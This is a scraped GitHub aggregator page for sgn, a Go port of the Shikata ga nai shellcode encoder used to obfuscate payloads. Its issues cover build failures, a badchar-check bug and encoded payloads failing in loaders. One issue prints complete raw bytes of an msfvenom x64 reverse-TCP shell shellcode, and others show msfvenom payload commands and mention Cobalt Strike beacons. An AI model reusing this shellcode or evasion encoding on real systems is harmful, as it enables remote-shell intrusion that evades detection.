egebalci / sgn Goto Github PK

View Code? Open in Web Editor NEW

1.2K 28.0 177.0 872 KB

Shikata ga nai (仕方がない) encoder ported into go with several improvements

License: MIT License

Go 94.02% Makefile 1.69% Shell 3.46% Dockerfile 0.83%

sgn's People

Stargazers

Watchers

Forkers

dviros analyticsearch sswares marpie kyleevers 0x00-0x00 m00zh33 echocipher pyking smitnald layzhi wolfking2 invokethreatguy askyeye gdraperi cx-4 dannymas elephacking crackercat quinn-yan aitorcastel alessiodallapiazza kildonan5 chaitanyakrishna reanimat0r nugxperience devpwn 1nd0 randsec mmg1 5l1v3r1 ceyhuncamli ptyspawn jack51706 sec-js avineshwar gh0st0ne jonathanzhou348 enlalibreta ayorz8v0gcg killvxk ndur0 richardsonjf capnspacehook evenbily mewbak fdlucifer shantanu561993 thegetch edermi n00xt tolgaexploder kaulanab axax002 kyhvedn nosorry actorexpose hack404-007 kungia09 twi1ight fnsank ondrik8 iiiusky yalonso7 nullcult ch-rigu ishaanahuja7 pitbullcan agelovito sesyi niummm roytse aaaddress1 kennyzeng alehacksp phuong39 b1gw00d eric-ant gavz terrynini puzzithinker sensi-1337 harry1080 opensesamedoors rank0 wisdark tobor jusorlee zhuhuibeishadiao majid-derkaoui uyid jabdy86 green-parrot-sec yougar0 akkuman iosname filipesam coelho-faminto retutils gamblingmaster2020

sgn's Issues

running gcc failed

I get the following error when installing by the suggested method on Debian 11

❯ go install github.com/EgeBalci/sgn@latest                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            19:38:59
# github.com/EgeBalci/sgn
/usr/local/go/pkg/tool/linux_amd64/link: running gcc failed: exit status 1
/usr/bin/ld: cannot find -lkeystone
/usr/bin/ld: cannot find -lkeystone
collect2: error: ld returned 1 exit status

Badchars with NULL byte doesn't seem to work

When a payload like messagebox is encoded with sgn and badchars are not specified it finishes in a second. If the badchars are specified like:

-badchars \x00
-badchars 00
-badchars '\x00'

Then Ciphering payload uses the CPU on 100% and never finishes. NULL characters are quite frequently are the source of the issue of payload delivery, maybe this should be looked into.

I assume it uses a brute-force approach to generate the payload and its regenerates it if NULL byte is still part of it? Is the algorithm capable to generate NULL-byte free payload?

# sgn -badchars \\x00 -a 64 messagebox.bin
       __   _ __        __                               _ 
  ___ / /  (_) /_____ _/ /____ _  ___ ____ _  ___  ___ _(_)
 (_-</ _ \/ /  '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ / 
/___/_//_/_/_/\_\\_,_/\__/\_,_/  \_, /\_,_/ /_//_/\_,_/_/  
========[Author:-Ege-Balcı-]====/___/=======v2.0.0=========  
    ┻━┻ ︵ヽ(`Д´)ﾉ︵ ┻━┻           (ノ ゜Д゜)ノ ︵ 仕方がない

- Ciphering payload...

SGN 2.1 doesnt work? (most of the time)

The shellcodes generated by SGN 2.1 dont seem to work most of the time.

Windows 10, 64bit executables. Using shellcode from mgeeky, shellcode loader runshc from https://github.com/hasherezade/masm_shc.

With SGN 2.1:

PS C:\Users\hacker\source\> C:\tools\sgn2.1\sgn.exe --arch=64 -i .\shellcodes\calc64.bin -o shellcodes\calc64.bin.sgn   
       __   _ __        __                               _
  ___ / /  (_) /_____ _/ /____ _  ___ ____ _  ___  ___ _(_)
 (_-</ _ \/ /  '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ /
/___/_//_/_/_/\_\\_,_/\__/\_,_/  \_, /\_,_/ /_//_/\_,_/_/
========[Author:-Ege-Balcı-]====/___/=======v2.0.1=========
    ┻━┻ ︵ヽ(`Д´)ﾉ︵ ┻━┻           (ノ ゜Д゜)ノ ︵ 仕方がない

[*] Input: .\shellcodes\calc64.bin
[*] Input Size: 272
[*] Outfile: shellcodes\calc64.bin.sgn
[+] Final size: 409
[+] All done ＼(＾O＾)／
PS C:\Users\hacker\source> C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe .\shellcodes\calc64.bin.sgn
[*] Reading module from: .\shellcodes\calc64.bin.sgn
[*] Running the shellcode:

-> No Calc appears

With SGN 2.0:

PS C:\Users\hacker\source> C:\tools\sgn2.0\sgn.exe -a 64 .\shellcodes\calc64.bin                                              
       __   _ __        __                               _   
  ___ / /  (_) /_____ _/ /____ _  ___ ____ _  ___  ___ _(_)  
 (_-</ _ \/ /  '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ /   
/___/_//_/_/_/\_\\_,_/\__/\_,_/  \_, /\_,_/ /_//_/\_,_/_/    
========[Author:-Ege-Balcı-]====/___/=======v2.0.0=========  
    ┻━┻ ︵ヽ(`Д´)ﾉ︵ ┻━┻           (ノ ゜Д゜)ノ ︵ 仕方がない

[*] Input: .\shellcodes\calc64.bin
[*] Input Size: 272
[*] Outfile: .\shellcodes\calc64.bin.sgn   
[+] Final size: 352
[+] All done ＼(＾O＾)／
PS C:\Users\hacker\source> C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe .\shellcodes\calc64.bin.sgn
[*] Reading module from: .\shellcodes\calc64.bin.sgn
[*] Running the shellcode:

-> Calc Opens

Attached is one working, one non-working shellcode.
sgn.zip

"go get" is not recommended to use

Hi,
the Go team suggests that we should use "go install github.com/example/example.git@latest" to download+compile latest package because "go get" will not support compile in the future.

See:https://go.dev/doc/go-get-install-deprecation

Create a release?

This is an awesome tool, would be more awesome if there was a release package to easily download it instead of having to compile it.

Doesn't seem to work

Hi,

SGN doesn't seem to work with the Cobaltstrike Payload.

sgn.exe -a 64 -c 6 -plain-decoder beacon.bin
       __   _ __        __                               _
  ___ / /  (_) /_____ _/ /____ _  ___ ____ _  ___  ___ _(_)
 (_-</ _ \/ /  '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ /
/___/_//_/_/_/\_\\_,_/\__/\_,_/  \_, /\_,_/ /_//_/\_,_/_/
========[Author:-Ege-Balcı-]====/___/=======v2.0.0=========
    ┻━┻ ︵ヽ(`Д´)ﾉ︵ ┻━┻           (ノ ゜Д゜)ノ ︵ 仕方がない

[*] Input Size: 261120
[*] Outfile: beacon.bin.sgn
[+] Final size: 261311
[+] All done ＼(＾O＾)／

Once I try to load this https://github.com/slaeryan/AQUARMOURY/blob/master/Wraith/Testing/Loader.cpp the original beacon.bin works while beacon.bin.sgn doesn't. Please check and update. I am using the version available for download in the Releases folder

Shellcode encrypted with SGN does not run

Hi,

I have created a shellcode via msfvenom using the command below, this shellcode is run via a loader and it works fine:

msfvenom -p windows/x64/exec CMD="calc.exe" -a x64 -o calc.bin

I then executed below command which produced calc.bin.sgn, when i load this via my loader and other loaders it does not work:

sgn -a 64 calc.bin

am i doing something wrong here ? or is there an issue ?

fatal error: keystone/keystone.h: No such file or directory

This project seems very interesting and I would like to play around with it; however, I am having trouble compiling it.

corrupted shellcode when increasing iterations

hello,

i am having some issues with the project since it's generating corrupted shellcode when using multiple iterations. (eg. 10)

the command that i am using to generate the (corrupted) shellcode has a random number of iterations and it's the following:

sgn -a $BITS -c `expr $RANDOM % 10 + 1` -o /tmp/shellcode.bin $BLOB

when i set -c 1 it works, otherwise the shellcode crashes.

the shellcode that i have used for testing was generated with the following command:

msfvenom -p windows/x64/messagebox TEXT=hello TITLE=hello -f raw > messagebox.bin

Decypter register selection error causes shellcode crash

The above part is the correct register selection, decryption uses three separate registers.

The following part is the wrong register selection. There is a conflict between the key register and the other two registers, resulting in an error in decryption. In this example, the key register is the 8-bit register of the data pointer register, causing the data pointer to be modified in the decryption loop.

Error building sgn using mingw from linux

Hi EdgeBalci,

Trying to cross-compile and build from linux and getting the error in the screenshot below;

FYI; keystone is built based on the steps listed in here

the linking path was changed to /home/med... location where keystone shared libs are located.

Any idea what might be causing this error?

Thanks.

Badchars still bad

Hi,

There is a bug in the way that badchars are identified:

sgn/main.go

Lines 101 to 105 in 9800932

 for b := range badBytes { 

 if strings.Contains(string(p), string(b)) { 

 continue 

 } 

 }

the range operator returns an iterable index, not the value at the index, and the continue keyword breaks out of the inner range loop, not the outer loop. So when a badchar is identified (which will just be a number counting from 0 to however many badchars were in the parameter, not the actual badchar), the program drops out and into the 'write file, everything is good' part, even though it still has badchars.

When I fixed this, it took an extremely long time to brute force a single badchar (null) on a reasonably large shellcode blob. I suspect that removing/altering badchars may need to be a separate deliberate encoding step, rather than hoping that sgn just happens to not have the character in the output.

ld: cannot find -lkeystone: No such file or directory

any tips?

$ go install github.com/EgeBalci/sgn@latest
go: downloading github.com/EgeBalci/sgn v0.0.0-20221110152022-2dfae644524b
go: downloading github.com/briandowns/spinner v1.11.1
go: downloading github.com/fatih/color v1.10.0
go: downloading github.com/EgeBalci/keystone-go v0.0.0-20200525180613-e6c7cd32ceae
go: downloading github.com/olekukonko/tablewriter v0.0.4
go: downloading github.com/mattn/go-colorable v0.1.8
go: downloading github.com/mattn/go-isatty v0.0.12
go: downloading github.com/mattn/go-runewidth v0.0.7
go: downloading golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae
# github.com/EgeBalci/sgn
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
collect2: error: ld returned 1 exit status

unable to produce exe

Hi there! my shellcode is windows/x64/shell_reverse_tcp with LHOST=127.0.0.1 and LPORT=6677 as below:

\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x1a\x15\x7f\x00\x00\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5

and I call sgn with following command:

sgn -a 64 -safe -plain-decoder -c 1 payload.bin

I use shcode2exe to produce executable but it is not working!
when I use my normal msfvenom shellcode as posted above, the result exe works fine.
OS: Windows 10
SGN: binary
Cheers!

I create a tool that bring sgn to javascript

I replace all cgo(github.com/EgeBalci/keystone-go) to github.com/AlexAltea/keystone.js. Then it is compiled to wasm.

repo: https://github.com/akkuman/sgn

demo project: https://github.com/akkuman/sgn-html

live demo: http://akkuman.github.io/sgn-html/

	for b := range badBytes {
	if strings.Contains(string(p), string(b)) {
	continue
	}
	}

egebalci / sgn Goto Github PK

sgn's People

Stargazers

Watchers

Forkers

sgn's Issues

Recommend Projects

Recommend Topics

Recommend Org